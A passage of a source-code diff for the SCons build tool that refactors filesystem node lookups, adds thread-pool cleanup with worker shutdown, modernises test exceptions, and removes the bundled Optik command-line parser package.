SCons.Util.is_String(l): -# l = str(l) -# if l[:lsp] == stripprefix: -# l = l[lsp:] -# if l[-lss:] == stripsuffix: -# l = l[:-lss] -# stripped.append(l) -# -# return c(prefix, stripped, suffix, env) + lsp = len(stripprefix) + lss = len(stripsuffix) + stripped = [] + for l in SCons.PathList.PathList(list).subst_path(env, None, None): + if isinstance(l, SCons.Node.FS.File): + stripped.append(l) + continue + if not SCons.Util.is_String(l): + l = str(l) + if l[:lsp] == stripprefix: + l = l[lsp:] + if l[-lss:] == stripsuffix: + l = l[:-lss] + stripped.append(l) + + return c(prefix, stripped, suffix, env) def _defines(prefix, defs, suffix, env, c=_concat_ixes): """A wrapper around _concat_ixes that turns a list or string File src/engine/SCons/Environment.py # Prepend './' so the lookup doesn't interpret an initial # '#' on the file name portion as meaning the Node should # be relative to the top-level SConstruct directory. - target = self.fs.Entry('.'+os.sep+src.name, dnode) + target = dnode.Entry('.'+os.sep+src.name) tgt.extend(InstallBuilder(self, target, src)) return tgt File src/engine/SCons/Job.py signal.signal(signal.SIGINT, signal.SIG_IGN) raise + def cleanup(self): + self.job.cleanup() + class Serial: """This class is used to execute tasks in series, and is more efficient than Parallel, but is only appropriate for non-parallel builds. Only task.postprocess() + def cleanup(self): + pass # Trap import failure so that everything in the Job module but the # Parallel class (and its dependent classes) will work if the interpreter while 1: task = self.requestQueue.get() + if not task: + # The "None" value is used as a sentinel by + # ThreadPool.cleanup(). This indicates that there + # are no more tasks, so we should quit. + break + try: task.execute() except KeyboardInterrupt: self.resultsQueue = Queue.Queue(0) # Create worker threads + self.workers = [] for _ in range(num): - Worker(self.requestQueue, self.resultsQueue) + worker = Worker(self.requestQueue, self.resultsQueue) + self.workers.append(worker) def put(self, obj): """Put task into request queue.""" return self.resultsQueue.get(block) def preparation_failed(self, obj): - self.resultsQueue.put((obj, 0)) + self.resultsQueue.put((obj, False)) + + def cleanup(self): + """ + Shuts down the thread pool, giving each worker thread a + chance to shut down gracefully. + """ + # For each worker thread, put a sentinel "None" value + # on the requestQueue (indicating that there's no work + # to be done) so that each worker thread will get one and + # terminate gracefully. + for _ in self.workers: + self.requestQueue.put(None) + + # Wait for all of the workers to terminate. + # + # If we don't do this, later Python versions (2.4, 2.5) often + # seem to raise exceptions during shutdown. This happens + # in requestQueue.get(), as an assertion failure that + # requestQueue.not_full is notified while not acquired, + # seemingly because the main thread has shut down (or is + # in the process of doing so) while the workers are still + # trying to pull sentinels off the requestQueue. + # + # Normally these terminations should happen fairly quickly, + # but we'll stick a one-second timeout on here just in case + # someone gets hung. + for worker in self.workers: + worker.join(1.0) + self.workers = [] class Parallel: """This class is used to execute tasks in parallel, and is somewhat if self.tp.resultsQueue.empty(): break + + def cleanup(self): + self.tp.cleanup() File src/engine/SCons/JobTests.py self.was_prepared = 1 def execute(self): - raise "exception" + raise Exception def executed(self): self.taskmaster.num_executed = self.taskmaster.num_executed + 1 goodnode.__init__(self) self.expect_to_be = SCons.Node.failed def build(self, **kw): - raise 'badnode exception' + raise Exception, 'badnode exception' class slowbadnode (badnode): def build(self, **kw): # it is faster than slowgoodnode then these could complete # while the scheduler is sleeping. time.sleep(0.05) - raise 'slowbadnode exception' + raise Exception, 'slowbadnode exception' class badpreparenode (badnode): def prepare(self): - raise 'badpreparenode exception' + raise Exception, 'badpreparenode exception' class _SConsTaskTest(unittest.TestCase): File src/engine/SCons/Node/FS.py self.cwd = None # will hold the SConscript directory for target nodes self.duplicate = directory.duplicate + def must_be_same(self, klass): + """ + This node, which already existed, is being looked up as the + specified klass. Raise an exception if it isn't. + """ + if self.__class__ is klass or klass is Entry: + return + raise TypeError, "Tried to lookup %s '%s' as a %s." %\ + (self.__class__.__name__, self.path, klass.__name__) + def get_dir(self): return self.dir name=self.name while dir: if dir.srcdir: - srcnode = self.fs.Entry(name, dir.srcdir, - klass=self.__class__) + srcnode = dir.srcdir.Entry(name) + srcnode.must_be_same(self.__class__) return srcnode name = dir.name + os.sep + name dir = dir.up() else: return self.get_contents() - def must_be_a_Dir(self): + def must_be_same(self, klass): """Called to make sure a Node is a Dir. Since we're an Entry, we can morph into one.""" - self.__class__ = Dir - self._morph() - return self + if not self.__class__ is klass: + self.__class__ = klass + self._morph() + self.clear # The following methods can get called before the Taskmaster has # had a chance to call disambiguate() directly to see if this Entry def getcwd(self): return self._cwd - def __checkClass(self, node, klass): - if isinstance(node, klass) or klass == Entry: - return node - if node.__class__ == Entry: - node.__class__ = klass - node._morph() - return node - raise TypeError, "Tried to lookup %s '%s' as a %s." % \ - (node.__class__.__name__, node.path, klass.__name__) - def _doLookup_key(self, fsclass, name, directory = None, create = 1): return (fsclass, name, directory) # We tried to look up the entry in either an Entry or # a File. Give whatever it is a chance to do what's # appropriate: morph into a Dir or raise an exception. - directory.must_be_a_Dir() + directory.must_be_same(Dir) entries = directory.entries try: directory = entries[norm] directory.add_wkid(d) directory = d - directory.must_be_a_Dir() + directory.must_be_same(Dir) try: e = directory.entries[last_norm] directory.entries[last_norm] = result directory.add_wkid(result) else: - result = self.__checkClass(e, fsclass) + e.must_be_same(fsclass) + result = e memo_dict[memo_key] = result If directory is None, and name is a relative path, then the same applies. """ - if not SCons.Util.is_String(name): - # This handles cases where the object is a Proxy wrapping - # a Node.FS.File object (e.g.). It would be good to handle - # this more directly some day by having the callers of this - # function recognize that a Proxy can be treated like the - # underlying object (that is, get rid of the isinstance() - # calls that explicitly look for a Node.FS.Base object). + try: + # Decide if this is a top-relative look up. The normal case + # (by far) is handed a non-zero-length string to look up, + # so just (try to) check for the initial '#'. + top_relative = (name[0] == '#') + except (AttributeError, IndexError): + # The exceptions we may encounter in unusual cases: + # AttributeError: a proxy without a __getitem__() method. + # IndexError: a null string. + top_relative = False name = str(name) - if name and name[0] == '#': + if top_relative: directory = self.Top name = name[1:] if name and (name[0] == os.sep or name[0] == '/'): klass = Entry if isinstance(name, Base): - return self.__checkClass(name, klass) + name.must_be_same(klass) + return name else: if directory and not isinstance(directory, Dir): directory = self.Dir(directory) def entry_tpath(self, name): return self.tpath + os.sep + name - def must_be_a_Dir(self): - """Called to make sure a Node is a Dir. Since we're already - one, this is a no-op for us.""" - return self - def entry_exists_on_disk(self, name): try: d = self.on_disk_entries self.tpath = name + os.sep self._morph() + def must_be_same(self, klass): + if klass is Dir: + return + Base.must_be_same(self, klass) + def __str__(self): return self.abspath as dependency info. Convert the strings to actual Nodes (for use by the --debug=explain code and --implicit-cache). """ - Entry_func = self.node.dir.Entry + def str_to_node(s, entry=self.node.dir.Entry): + # This is a little bogus; we're going to mimic the lookup + # order of env.arg2nodes() by hard-coding an Alias lookup + # before we assume it's an Entry. This should be able to + # go away once the Big Signature Refactoring pickles the + # actual NodeInfo object, which will let us know precisely + # what type of Node to turn it into. + import SCons.Node.Alias + n = SCons.Node.Alias.default_ans.lookup(s) + if not n: + n = entry(s) + return n for attr in ['bsources', 'bdepends', 'bimplicit']: try: val = getattr(self, attr) except AttributeError: pass else: - setattr(self, attr, map(Entry_func, val)) + setattr(self, attr, map(str_to_node, val)) def format(self): result = [ self.ninfo.format() ] bkids = self.bsources + self.bdepends + self.bimplicit def Entry(self, name): """Create an entry node named 'name' relative to the SConscript directory of this file.""" - return self.fs.Entry(name, self.cwd) + return self.cwd.Entry(name) def Dir(self, name): """Create a directory node named 'name' relative to the SConscript directory of this file.""" - return self.fs.Dir(name, self.cwd) + return self.cwd.Dir(name) def Dirs(self, pathlist): """Create a list of directories relative to the SConscript def File(self, name): """Create a file node named 'name' relative to the SConscript directory of this file.""" - return self.fs.File(name, self.cwd) + return self.cwd.File(name) #def generate_build_dict(self): # """Return an appropriate dictionary of values for building Note that there's a special trick here with the execute flag (one that's not normally done for other actions). Basically - if the user requested a noexec (-n) build, then + if the user requested a no_exec (-n) build, then SCons.Action.execute_actions is set to 0 and when any action is called, it does its showing but then just returns zero instead of actually calling the action execution operation. dir = os.path.join(self.fs.CachePath, subdir) return dir, os.path.join(dir, cache_sig) - def must_be_a_Dir(self): - """Called to make sure a Node is a Dir. Since we're already a - File, this is a TypeError...""" - raise TypeError, "Tried to lookup File '%s' as a Dir." % self.path - default_fs = None class FileFinder: File src/engine/SCons/Node/FSTests.py x = e.get_executor() x.add_pre_action('pre') x.add_post_action('post') - e.must_be_a_Dir() + e.must_be_same(SCons.Node.FS.Dir) a = x.get_action_list() assert a[0] == 'pre', a assert a[2] == 'post', a File src/engine/SCons/Optik/__init__.py -"""optik - -A powerful, extensible, and easy-to-use command-line parser for Python. - -By Greg Ward <[email protected]> - -See http://optik.sourceforge.net/ -""" - -# Copyright (c) 2001 Gregory P. Ward. All rights reserved. -# See the README.txt distributed with Optik for licensing terms. - -__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__" - -# Original Optik revision this is based on: -__Optik_revision__ = "__init__.py,v 1.11 2002/04/11 19:17:34 gward Exp" - -__version__ = "1.3" - - -# Re-import these for convenience -from SCons.Optik.option import Option -from SCons.Optik.option_parser import \ - OptionParser, SUPPRESS_HELP, SUPPRESS_USAGE -from SCons.Optik.errors import OptionValueError - - -# Some day, there might be many Option classes. As of Optik 1.3, the -# preferred way to instantiate Options is indirectly, via make_option(), -# which will become a factory function when there are many Option -# classes. -make_option = Option File src/engine/SCons/Optik/errors.py -"""optik.errors - -Exception classes used by Optik. -""" - -__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__" - -# Original Optik revision this is based on: -__Optik_revision__ = "errors.py,v 1.5 2002/02/13 23:29:47 gward Exp" - -# Copyright (c) 2001 Gregory P. Ward. All rights reserved. -# See the README.txt distributed with Optik for licensing terms. - -# created 2001/10/17 GPW (from optik.py) - - -class OptikError (Exception): - def __init__ (self, msg): - self.msg = msg - - def __str__ (self): - return self.msg - - -class OptionError (OptikError): - """ - Raised if an Option instance is created with invalid or - inconsistent arguments. - """ - - def __init__ (self, msg, option): - self.msg = msg - self.option_id = str(option) - - def __str__ (self): - if self.option_id: - return "option %s: %s" % (self.option_id, self.msg) - else: - return self.msg - -class OptionConflictError (OptionError): - """ - Raised if conflicting options are added to an OptionParser. - """ - -class OptionValueError (OptikError): - """ - Raised if an invalid option value is encountered on the command - line. - """ - -class BadOptionError (OptikError): - """ - Raised if an invalid or ambiguous option is seen on the command-line. - """ File src/engine/SCons/Optik/option.py -"""optik.option - -Defines the Option class and some standard value-checking functions. -""" - -__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__" - -# Original Optik revision this is based on: -__Optik_revision__ = "option.py,v 1.19.2.1 2002/07/23 01:51:14 gward Exp" - -# Copyright (c) 2001 Gregory P. Ward. All rights reserved. -# See the README.txt distributed with Optik for licensing terms. - -# created 2001/10/17, GPW (from optik.py) - -import sys -import string -from types import TupleType, ListType, DictType -from SCons.Optik.errors import OptionError, OptionValueError - -_builtin_cvt = { "int" : (int, "integer"), - "long" : (long, "long integer"), - "float" : (float, "floating-point"), - "complex" : (complex, "complex") } - -def check_builtin (option, opt, value): - (cvt, what) = _builtin_cvt[option.type] - try: - return cvt(value) - except ValueError: - raise OptionValueError( - #"%s: invalid %s argument %s" % (opt, what, repr(value))) - "option %s: invalid %s value: %s" % (opt, what, repr(value))) - -def check_choice(option, opt, value): - if value in option.choices: - return value - else: - choices = string.join(map(repr, option.choices),", ") - raise OptionValueError( - "option %s: invalid choice: %s (choose from %s)" - % (opt, repr(value), choices)) - -# Not supplying a default is different from a default of None, -# so we need an explicit "not supplied" value. -NO_DEFAULT = "NO"+"DEFAULT" - - -class Option: - """ - Instance attributes: - _short_opts : [string] - _long_opts : [string] - - action : string - type : string - dest : string - default : any - nargs : int - const : any - choices : [string] - callback : function - callback_args : (any*) - callback_kwargs : { string : any } - help : string - metavar : string - """ - - # The list of instance attributes that may be set through - # keyword args to the constructor. - ATTRS = ['action', - 'type', - 'dest', - 'default', - 'nargs', - 'const', - 'choices', - 'callback', - 'callback_args', - 'callback_kwargs', - 'help', - 'metavar'] - - # The set of actions allowed by option parsers. Explicitly listed - # here so the constructor can validate its arguments. - ACTIONS = ("store", - "store_const", - "store_true", - "store_false", - "append", - "count", - "callback", - "help", - "version") - - # The set of actions that involve storing a value somewhere; - # also listed just for constructor argument validation. (If - # the action is one of these, there must be a destination.) - STORE_ACTIONS = ("store", - "store_const", - "store_true", - "store_false", - "append", - "count") - - # The set of actions for which it makes sense to supply a value - # type, ie. where we expect an argument to this option. - TYPED_ACTIONS = ("store", - "append", - "callback") - - # The set of known types for option parsers. Again, listed here for - # constructor argument validation. - TYPES = ("string", "int", "long", "float", "complex", "choice") - - # Dictionary of argument checking functions, which convert and - # validate option arguments according to the option type. - # - # Signature of checking functions is: - # check(option : Option, opt : string, value : string) -> any - # where - # option is the Option instance calling the checker - # opt is the actual option seen on the command-line - # (eg. "-a", "--file") - # value is the option argument seen on the command-line - # - # The return value should be in the appropriate Python type - # for option.type -- eg. an integer if option.type == "int". - # - # If no checker is defined for a type, arguments will be - # unchecked and remain strings. - TYPE_CHECKER = { "int" : check_builtin, - "long" : check_builtin, - "float" : check_builtin, - "complex" : check_builtin, - "choice" : check_choice, - } - - - # CHECK_METHODS is a list of unbound method objects; they are called - # by the constructor, in order, after all attributes are - # initialized. The list is created and filled in later, after all - # the methods are actually defined. (I just put it here because I - # like to define and document all class attributes in the same - # place.) Subclasses that add another _check_*() method should - # define their own CHECK_METHODS list that adds their check method - # to those from this class. - CHECK_METHODS = None - - - # -- Constructor/initialization methods ---------------------------- - - def __init__ (self, *opts, **attrs): - # Set _short_opts, _long_opts attrs from 'opts' tuple - opts = self._check_opt_strings(opts) - self._set_opt_strings(opts) - - # Set all other attrs (action, type, etc.) from 'attrs' dict - self._set_attrs(attrs) - - # Check all the attributes we just set. There are lots of - # complicated interdependencies, but luckily they can be farmed - # out to the _check_*() methods listed in CHECK_METHODS -- which - # could be handy for subclasses! The one thing these all share - # is that they raise OptionError if they discover a problem. - for checker in self.CHECK_METHODS: - checker(self) - - def _check_opt_strings (self, opts): - # Filter out None because early versions of Optik had exactly - # one short option and one long option, either of which - # could be None. - opts = filter(None, opts) - if not opts: - raise OptionError("at least one option string must be supplied", - self) - return opts - - def _set_opt_strings (self, opts): - self._short_opts = [] - self._long_opts = [] - for opt in opts: - if len(opt) < 2: - raise OptionError( - "invalid option string %s: " - "must be at least two characters long" % (`opt`,), self) - elif len(opt) == 2: - if not (opt[0] == "-" and opt[1] != "-"): - raise OptionError( - "invalid short option string %s: " - "must be of the form -x, (x any non-dash char)" % (`opt`,), - self) - self._short_opts.append(opt) - else: - if not (opt[0:2] == "--" and opt[2] != "-"): - raise OptionError( - "invalid long option string %s: " - "must start with --, followed by non-dash" % (`opt`,), - self) - self._long_opts.append(opt) - - def _set_attrs (self, attrs): - for attr in self.ATTRS: - if attrs.has_key(attr): - setattr(self, attr, attrs[attr]) - del attrs[attr] - else: - if attr == 'default': - setattr(self, attr, NO_DEFAULT) - else: - setattr(self, attr, None) - if attrs: - raise OptionError( - "invalid keyword arguments: %s" % string.join(attrs.keys(),", "), - self) - - - # -- Constructor validation methods -------------------------------- - - def _check_action (self): - if self.action is None: - self.action = "store" - elif self.action not in self.ACTIONS: - raise OptionError("invalid action: %s" % (`self.action`,), self) - - def _check_type (self): - if self.type is None: - # XXX should factor out another class attr here: list of - # actions that *require* a type - if self.action in ("store", "append"): - if self.choices is not None: - # The "choices" attribute implies "choice" type. - self.type = "choice" - else: - # No type given? "string" is the most sensible default. - self.type = "string" - else: - if self.type not in self.TYPES: - raise OptionError("invalid option type: %s" % (`self.type`,), self) - if self.action not in self.TYPED_ACTIONS: - raise OptionError( - "must not supply a type for action %s" % (`self.action`,), self) - - def _check_choice(self): - if self.type == "choice": - if self.choices is None: - raise OptionError( - "must supply a list of choices for type 'choice'", self) - elif type(self.choices) not in (TupleType, ListType): - raise OptionError( - "choices must be a list of strings ('%s' supplied)" - % string.split(str(type(self.choices)),"'")[1], self) - elif self.choices is not None: - raise OptionError( - "must not supply choices for type %s" % (repr(self.type),), self) - - def _check_dest (self): - if self.action in self.STORE_ACTIONS and self.dest is None: - # No destination given, and we need one for this action. - # Glean a destination from the first long option string, - # or from the first short option string if no long options. - if self._long_opts: - # eg. "--foo-bar" -> "foo_bar" - self.dest = string.replace(self._long_opts[0][2:],'-', '_') - else: - self.dest = self._short_opts[0][1] - - def _check_const (self): - if self.action != "store_const" and self.const is not None: - raise OptionError( - "'const' must not be supplied for action %s" % (repr(self.action),), - self) - - def _check_nargs (self): - if self.action in self.TYPED_ACTIONS: - if self.nargs is None: - self.nargs = 1 - elif self.nargs is not None: - raise OptionError( - "'nargs' must not be supplied for action %s" % (repr(self.action),), - self) - - def _check_callback (self): - if self.action == "callback": - if not callable(self.callback): - raise OptionError( - "callback not callable: %s" % (repr(self.callback),), self) - if (self.callback_args is not None and - type(self.callback_args) is not TupleType): - raise OptionError( - "callback_args, if supplied, must be a tuple: not %s" - % (repr(self.callback_args),), self) - if (self.callback_kwargs is not None and - type(self.callback_kwargs) is not DictType): - raise OptionError( - "callback_kwargs, if supplied, must be a dict: not %s" - % (repr(self.callback_kwargs),), self) - else: - if self.callback is not None: - raise OptionError( - "callback supplied (%s) for non-callback option" - % (repr(self.callback),), self) - if self.callback_args is not None: - raise OptionError( - "callback_args supplied for non-callback option", self) - if self.callback_kwargs is not None: - raise OptionError( - "callback_kwargs supplied for non-callback option", self) - - - CHECK_METHODS = [_check_action, - _check_type, - _check_choice, - _check_dest, - _check_const, - _check_nargs, - _check_callback] - - - # -- Miscellaneous methods ----------------------------------------- - - def __str__ (self): - if self._short_opts or self._long_opts: - return string.join(self._short_opts + self._long_opts,"/") - else: - raise RuntimeError, "short_opts and long_opts both empty!" - - def takes_value (self): - return self.type is not None - - - # -- Processing methods -------------------------------------------- - - def check_value (self, opt, value): - checker = self.TYPE_CHECKER.get(self.type) - if checker is None: - return value - else: - return checker(self, opt, value) - - def process (self, opt, value, values, parser): - - # First, convert the value(s) to the right type. Howl if any - # value(s) are bogus. - if value is not None: - if self.nargs == 1: - value = self.check_value(opt, value) - else: - def cv(v,check=self.check_value,o=opt): - return check(o,v) - - value = tuple(map(cv,value)) - - # And then take whatever action is expected of us. - # This is a separate method to make life easier for - # subclasses to add new actions. - return self.take_action( - self.action, self.dest, opt, value, values, parser) - - def take_action (self, action, dest, opt, value, values, parser): - if action == "store": - setattr(values, dest, value) - elif action == "store_const": - setattr(values, dest, self.const) - elif action == "store_true": - setattr(values, dest, 1) - elif action == "store_false": - setattr(values, dest, 0) - elif action == "append": - values.ensure_value(dest, []).append(value) - elif action == "count": - setattr(values, dest, values.ensure_value(dest, 0) + 1) - elif action == "callback": - args = self.callback_args or () - kwargs = self.callback_kwargs or {} - apply( self.callback, (self, opt, value, parser,)+ args, kwargs) - elif action == "help": - parser.print_help() - sys.exit(0) - elif action == "version": - parser.print_version() - sys.exit(0) - else: - raise RuntimeError, "unknown action %s" % (repr(self.action),) - - return 1 - -# class Option File src/engine/SCons/Optik/option_parser.py -"""optik.option_parser - -Provides the OptionParser and Values classes. -""" - -__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__" - -# Original Optik revision this is based on: -__Optik_revision__ = "option_parser.py,v 1.38.2.1 2002/07/23 01:51:14 gward Exp" - -# Copyright (c) 2001 Gregory P. Ward. All rights reserved. -# See the README.txt distributed with Optik for licensing terms. - -# created 2001/10/17, GPW (from optik.py) - -import sys, os -import string -import types -from SCons.Optik.option import Option, NO_DEFAULT -from SCons.Optik.errors import OptionConflictError, OptionValueError, BadOptionError - -def get_prog_name (): - return os.path.basename(sys.argv[0]) - - -SUPPRESS_HELP = "SUPPRESS"+"HELP" -SUPPRESS_USAGE = "SUPPRESS"+"USAGE" - -class Values: - - def __init__ (self, defaults=None): - if defaults: - for (attr, val) in defaults.items(): - setattr(self, attr, val) - - - def _update_careful (self, dict): - """ - Update the option values from an arbitrary dictionary, but only - use keys from dict that already have a corresponding attribute - in self. Any keys in dict without a corresponding attribute - are silently ignored. - """ - for attr in dir(self): - if dict.has_key(attr): - dval = dict[attr] - if dval is not None: - setattr(self, attr, dval) - - def _update_loose (self, dict): - """ - Update the option values from an arbitrary dictionary, - using all keys from the dictionary regardless of whether - they have a corresponding attribute in self or not. - """ - self.__dict__.update(dict) - - def _update (self, dict, mode): - if mode == "careful": - self._update_careful(dict) - elif mode == "loose": - self._update_loose(dict) - else: - raise ValueError, "invalid update mode: %s" % (repr(mode),) - - def read_module (self, modname, mode="careful"): - __import__(modname) - mod = sys.modules[modname] - self._update(vars(mod), mode) - - def read_file (self, filename, mode="careful"): - vars = {} - execfile(filename, vars) - self._update(vars, mode) - - def ensure_value (self, attr, value): - if not hasattr(self, attr) or getattr(self, attr) is None: - setattr(self, attr, value) - return getattr(self, attr) - - -class OptionParser: - """ - Class attributes: - standard_option_list : [Option] - list of standard options that will be accepted by all instances - of this parser class (intended to be overridden by subclasses). - - Instance attributes: - usage : string - a usage string for your program. Before it is displayed - to the user, "%prog" will be expanded to the name of - your program (os.path.basename(sys.argv[0])). - option_list : [Option] - the list of all options accepted on the command-line of - this program - _short_opt : { string : Option } - dictionary mapping short option strings, eg. "-f" or "-X", - to the Option instances that implement them. If an Option - has multiple short option strings, it will appears in this - dictionary multiple times. - _long_opt : { string : Option } - dictionary mapping long option strings, eg. "--file" or - "--exclude", to the Option instances that implement them. - Again, a given Option can occur multiple times in this - dictionary. - defaults : { string : any } - dictionary mapping option destination names to default - values for each destination. - - allow_interspersed_args : boolean = true - if true, positional arguments may be interspersed with options. - Assuming -a and -b each take a single argument, the command-line - -ablah foo bar -bboo baz - will be interpreted the same as - -ablah -bboo -- foo bar baz - If this flag were false, that command line would be interpreted as - -ablah -- foo bar -bboo baz - -- ie. we stop processing options as soon as we see the first - non-option argument. (This is the tradition followed by - Python's getopt module, Perl's Getopt::Std, and other argument- - parsing libraries, but it is generally annoying to users.) - - rargs : [string] - the argument list currently being parsed. Only set when - parse_args() is active, and continually trimmed down as - we consume arguments. Mainly there for the benefit of - callback options. - largs : [string] - the list of leftover arguments that we have skipped while - parsing options. If allow_interspersed_args is false, this - list is always empty. - values : Values - the set of option values currently being accumulated. Only - set when parse_args() is active. Also mainly for callbacks. - - Because of the 'rargs', 'largs', and 'values' attributes, - OptionParser is not thread-safe. If, for some perverse reason, you - need to parse command-line arguments simultaneously in different - threads, use different OptionParser instances. - - """ - - standard_option_list = [] - - - def __init__ (self, - usage=None, - option_list=None, - option_class=Option, - version=None, - conflict_handler="error"): - self.set_usage(usage) - self.option_class = option_class - self.version = version - self.set_conflict_handler(conflict_handler) - self.allow_interspersed_args = 1 - - # Create the various lists and dicts that constitute the - # "option list". See class docstring for details about - # each attribute. - self._create_option_list() - - # Populate the option list; initial sources are the - # standard_option_list class attribute, the 'option_list' - # argument, and the STD_VERSION_OPTION global (if 'version' - # supplied). - self._populate_option_list(option_list) - - self._init_parsing_state() - - # -- Private methods ----------------------------------------------- - # (used by the constructor) - - def _create_option_list (self): - self.option_list = [] - self._short_opt = {} # single letter -> Option instance - self._long_opt = {} # long option -> Option instance - self.defaults = {} # maps option dest -> default value - - def _populate_option_list (self, option_list): - if self.standard_option_list: - self.add_options(self.standard_option_list) - if option_list: - self.add_options(option_list) - - def _init_parsing_state (self): - # These are set in parse_args() for the convenience of callbacks. - self.rargs = None - self.largs = None - self.values = None - - - # -- Simple modifier methods --------------------------------------- - - def set_usage (self, usage): - if usage is None: - self.usage = "usage: %prog [options]" - elif usage is SUPPRESS_USAGE: - self.usage = None - else: - self.usage = usage - - def enable_interspersed_args (self): - self.allow_interspersed_args = 1 - - def disable_interspersed_args (self): - self.allow_interspersed_args = 0 - - def set_conflict_handler (self, handler): - if handler not in ("ignore", "error", "resolve"): - raise ValueError, "invalid conflict_resolution value %s" % (repr(handler),) - self.conflict_handler = handler - - def set_default (self, dest, value): - self.defaults[dest] = value - - def set_defaults (self, **kwargs): - self.defaults.update(kwargs) - - def get_default_values(self): - return Values(self.defaults) - - - # -- Option-adding methods ----------------------------------------- - - def _check_conflict (self, option): - conflict_opts = [] - for opt in option._short_opts: - if self._short_opt.has_key(opt): - conflict_opts.append((opt, self._short_opt[opt])) - for opt in option._long_opts: - if self._long_opt.has_key(opt): - conflict_opts.append((opt, self._long_opt[opt])) - - if conflict_opts: - handler = self.conflict_handler - if handler == "ignore": # behaviour for Optik 1.0, 1.1 - pass - elif handler == "error": # new in 1.2 - raise OptionConflictError( - "conflicting option string(s): %s" - % string.join( map( lambda x: x[0], conflict_opts),", "), - option) - elif handler == "resolve": # new in 1.2 - for (opt, c_option) in conflict_opts: - if len(opt)>2 and opt[:2]=="--": - c_option._long_opts.remove(opt) - del self._long_opt[opt] - else: - c_option._short_opts.remove(opt) - del self._short_opt[opt] - if not (c_option._short_opts or c_option._long_opts): - self.option_list.remove(c_option) - - - def add_option (self, *args, **kwargs): - """add_option(Option) - add_option(opt_str, ..., kwarg=val, ...) - """ - if type(args[0]) is types.StringType: - option = apply(self.option_class,args, kwargs) - elif len(args) == 1 and not kwargs: - option = args[0] - if not isinstance(option, Option): - raise TypeError, "not an Option instance: %s" % (repr(option),) - else: - raise TypeError, "invalid arguments" - - self._check_conflict(option) - - self.option_list.append(option) - for opt in option._short_opts: - self._short_opt[opt] = option - for opt in option._long_opts: - self._long_opt[opt] = option - - if option.dest is not None: # option has a dest, we need a default - if option.default is not NO_DEFAULT: - self.defaults[option.dest] = option.default - elif not self.defaults.has_key(option.dest): - self.defaults[option.dest] = None - - def add_options (self, option_list): - for option in option_list: - self.add_option(option) - - - # -- Option query/removal methods ---------------------------------- - - def get_option (self, opt_str): - return (self._short_opt.get(opt_str) or - self._long_opt.get(opt_str)) - - def has_option (self, opt_str): - return (self._short_opt.has_key(opt_str) or - self._long_opt.has_key(opt_str)) - - - def remove_option (self, opt_str): - option = self._short_opt.get(opt_str) - if option is None: - option = self._long_opt.get(opt_str) - if option is None: - raise ValueError("no such option %s" % (repr(opt_str),)) - - for opt in option._short_opts: - del self._short_opt[opt] - for opt in option._long_opts: - del self._long_opt[opt] - self.option_list.remove(option) - - - # -- Option-parsing methods ---------------------------------------- - - def _get_args (self, args): - if args is None: - return sys.argv[1:] - else: - return args[:] # don't modify caller's list - - def parse_args (self, args=None, values=None): - """ - parse_args(args : [string] = sys.argv[1:], - values : Values = None) - -> (values : Values, args : [string]) - - Parse the command-line options found in 'args' (default: - sys.argv[1:]). Any errors result in a call to 'error()', which - by default prints the usage message to stderr and calls - sys.exit() with an error message. On success returns a pair - (values, args) where 'values' is an Values instance (with all - your option values) and 'args' is the list of arguments left - over after parsing options. - """ - rargs = self._get_args(args) - if values is None: - values = self.get_default_values() - - # Store the halves of the argument list as attributes for the - # convenience of callbacks: - # rargs - # the rest of the command-line (the "r" stands for - # "remaining" or "right-hand") - # largs - # the leftover arguments -- ie. what's left after removing - # options and their arguments (the "l" stands for "leftover" - # or "left-hand") - self.rargs = rargs - self.largs = largs = [] - self.values = values - - try: - stop = self._process_args(largs, rargs, values) - except (BadOptionError, OptionValueError), err: - self.error(err.msg) - - args = largs + rargs - return self.check_values(values, args) - - def check_values (self, values, args): - """ - check_values(values : Values, args : [string]) - -> (values : Values, args : [string]) - - Check that the supplied option values and leftover arguments are - valid. Returns the option values and leftover arguments - (possibly adjusted, possibly completely new -- whatever you - like). Default implementation just returns the passed-in - values; subclasses may override as desired. - """ - return (values, args) - - def _process_args (self, largs, rargs, values): - """_process_args(largs : [string], - rargs : [string], - values : Values) - - Process command-line arguments and populate 'values', consuming - options and arguments from 'rargs'. If 'allow_interspersed_args' is - false, stop at the first non-option argument. If true, accumulate any - interspersed non-option arguments in 'largs'. - """ - while rargs: - arg = rargs[0] - # We handle bare "--" explicitly, and bare "-" is handled by the - # standard arg handler since the short arg case ensures that the - # len of the opt string is greater than 1. - if arg == "--": - del rargs[0] - return - elif arg[0:2] == "--": - # process a single long option (possibly with value(s)) - self._process_long_opt(rargs, values) - elif arg[:1] == "-" and len(arg) > 1: - # process a cluster of short options (possibly with - # value(s) for the last one only) - self._process_short_opts(rargs, values) - elif self.allow_interspersed_args: - largs.append(arg) - del rargs[0] - else: - return # stop now, leave this arg in rargs - - # Say this is the original argument list: - # [arg0, arg1, ..., arg(i-1), arg(i), arg(i+1), ..., arg(N-1)] - # ^ - # (we are about to process arg(i)). - # - # Then rargs is [arg(i), ..., arg(N-1)] and largs is a *subset* of - # [arg0, ..., arg(i-1)] (any options and their arguments will have - # been removed from largs). - # - # The while loop will usually consume 1 or more arguments per pass. - # If it consumes 1 (eg. arg is an option that takes no arguments), - # then after _process_arg() is done the situation is: - # - # largs = subset of [arg0, ..., arg(i)] - # rargs = [arg(i+1), ..., arg(N-1)] - # - # If allow_interspersed_args is false, largs will always be - # *empty* -- still a subset of [arg0, ..., arg(i-1)], but - # not a very interesting subset! - - def _match_long_opt (self, opt): - """_match_long_opt(opt : string) -> string - - Determine which long option string 'opt' matches, ie. which one - it is an unambiguous abbrevation for. Raises BadOptionError if - 'opt' doesn't unambiguously match any long option string. - """ - return _match_abbrev(opt, self._long_opt) - - def _process_long_opt (self, rargs, values): - arg = rargs.pop(0) - - # Value explicitly attached to arg? Pretend it's the next - # argument. - if "=" in arg: - (opt, next_arg) = string.split(arg,"=", 1) - rargs.insert(0, next_arg) - had_explicit_value = 1 - else: - opt = arg - had_explicit_value = 0 - - opt = self._match_long_opt(opt) - option = self._long_opt[opt] - if option.takes_value(): - nargs = option.nargs - if len(rargs) < nargs: - if nargs == 1: - self.error("%s option requires a value" % opt) - else: - self.error("%s option requires %d values" - % (opt, nargs)) - elif nargs == 1: - value = rargs.pop(0) - else: - value = tuple(rargs[0:nargs]) - del rargs[0:nargs] - - elif 